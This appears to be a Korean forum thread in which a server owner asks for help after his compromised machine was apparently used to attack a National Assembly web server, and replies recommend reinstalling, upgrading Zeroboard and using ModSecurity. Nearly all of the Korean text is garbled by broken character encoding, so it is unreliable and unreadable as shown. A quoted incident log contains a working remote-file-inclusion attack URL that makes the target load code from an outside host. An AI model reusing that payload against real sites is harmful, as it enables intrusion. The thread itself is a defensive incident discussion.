Á¦¼¹ö°¡ PHP injection °ø°ÝÀ» ´çÇؼ Á¦°¡ ±¹È¸ ȨÇǸ¦ ÇØÅ·½ÃµµÇÑ°É·Î ¿ÀÀι޾ҽÀ´Ï´Ù.
Àú´Â ÇØÅ·½ÃµµÇÑÀûÀÌ ¾ø´Âµ¥ ´©°¡ Á¦¼¹ö¸¦ °ÅÃļ ¾Æ·¡¿Í °°ÀÌ °ø°ÝÀ» ½ÃµµÇؼ
Á¦°¡ ÇØÅ·ÇÑ°É·Î ¿ÀÇظ¦ ¹Þ°í ÀÖ½À´Ï´Ù.
ÀÌ°Å ¾î¶»°Ô ´ëóÇØ¾ß µÉ±î¿ä?
·Î±× ºÐ¼® ¹æ¹ý°ú Àç¹ß ´ëó¹æ¹ý¿¡ ´ëÇÏ¿© Á¶¾ðÀ» ºÎŹµå¸³´Ï´Ù(__)
-------------------------------------------------------
KT ½ºÆÔ´ëÀÀ¼¾ÅÍ
Tel : 080-223-xxx
E-mail : ***@******.net
----- Original Message -----
From: ±¹È¸º¸¾È°üÁ¦¼¾ÅÍ
To: ***@******.net ; ***@******.net ; ***@*****.kornet.net
Sent: Friday, January 08, 2010 5:07 AM
Subject: KT¿¡ ÇÒ´çµÈ ¾ÆÀÌÇÇ¿¡¼ ħÇؽõµ°¡ ¹ß»ý ÇÏ¿´½À´Ï´Ù. -±¹È¸º¸¾È°üÁ¦¼¾ÅÍ-
¾È³çÇϽʴϱî.
±¹È¸ º¸¾È°üÁ¦¼¾ÅÍÀÔ´Ï´Ù.
KT¿¡ ÇÒ´çµÈ ¾ÆÀÌÇÇ 125.141.91.xxx¿¡¼ ±¹È¸ À¥¼¹ö·Î PHP injection °ø°ÝÀÌ ¹ß»ý Çß½À´Ï´Ù.
-ÀϽà 2010³â 1¿ù 8ÀÏ ¿ÀÀü 3½Ã 6ºÐ°æ
-src IP : 125.141.91.xxx
-dst IP : 211.46.92.xxx
-°ø°Ý ³»¿ë : PHPÀÎÁ§¼Ç
-°ø°ÝURL = www.***.go.kr/renew07/anc/notice/popup_mng/popup_vw.j&hellip://skin/sirini_simplism_gallery_v4/setup.php?dir=http://musicadelibreria.net/footer??
»ó±â ³»¿ªÀº º¸¾È»ó ·Î±×Áß ÀϺθ¸ ¹ßÃéÇÏ¿© °ø°³ ÇÏ¿´À¸¸ç, src IP¿¡ ´ëÇØ 80Æ÷Æ®·Î Á¢¼Ó ÇØ º» °á°ú
À¥¼¹ö·Î È®ÀεǾî ÇØ´ç ¾ÆÀÌÇÇ¿¡ ´ëÇØ Â÷´Ü ÇÏ¿´½À´Ï´Ù.
Á¶Ä¡ ÈÄ È¸½Å ¿äû µå¸³´Ï´Ù.
¼ö°íÇϽʽÿä.
±¹È¸ º¸¾È°üÁ¦¼¾ÅÍ
02-786-xxxx
µµ¿òÀº ¸øµÇ¾î µå¸®Áö¸¸ Àß ÇØ°áµÇ±æ °Ì´Ï´Ù.
ÀÏ´Ü ½Ã½ºÅÛ ¶Õ·ÈÀ¸´Ï ¼¹ö°¡ ¹«°á¼ºÀÌ ¾ø´Â »óÅÂÀÔ´Ï´Ù.
½Ã½ºÅÛÀ» ÃֽŠ¾÷µ¥ÀÌÆ®·Î »õ·Î ¼³Ä¡Çϼ¼¿ä.
±×¸®°í ¼¹ö º¸¾È»ó ¹®Á¦¹ß»ýÀ¸·Î ÀÎÇÑ »ç°í¿´À¸¸ç, ¹Ì¾ÈÇϸç, Áï°¢ º¸¾ÈÁ¶Ä¡¸¦ ÃëÇÏ¿´°í , ÇâÈÄ Àç¹ß»ýµÇÁö ¾Êµµ·Ï ÇÏ°Ú´Ù ¶ó´Â ³»¿ëÀ¸·Î ȸ½ÅÇØÁÖ¸é µË´Ï´Ù.
Á¦·Îº¸µå º¸¾È °ÈÇϽðųª, ¾÷±×·¹À̵å Çϼžߵǰڳ׿ä. zero v4´Â Á¤¸» ¹®Á¦ ¸¹½À´Ï´Ù. ¾Ç¿ë¼ÒÁö..
À¥¼¹ö ÀÎÁ§¼Ç °ø°Ý¿¡ ´ëÀÀÇϽ÷Á¸é, À¥¼¹ö Firewall ModSecurity¸¦ Àß È°¿ëÇϽô°͵µ Çѹæ¹ýÀÔ´Ï´Ù.
http://www.modsecurity.org/documentation/
¼¹ö ±âº» º¸¾Èµµ öÀúÈ÷ ÇÏ¼Å¾ß ´©¸í¾²´Â ÀÏÀÌ ¾ø½À´Ï´Ù.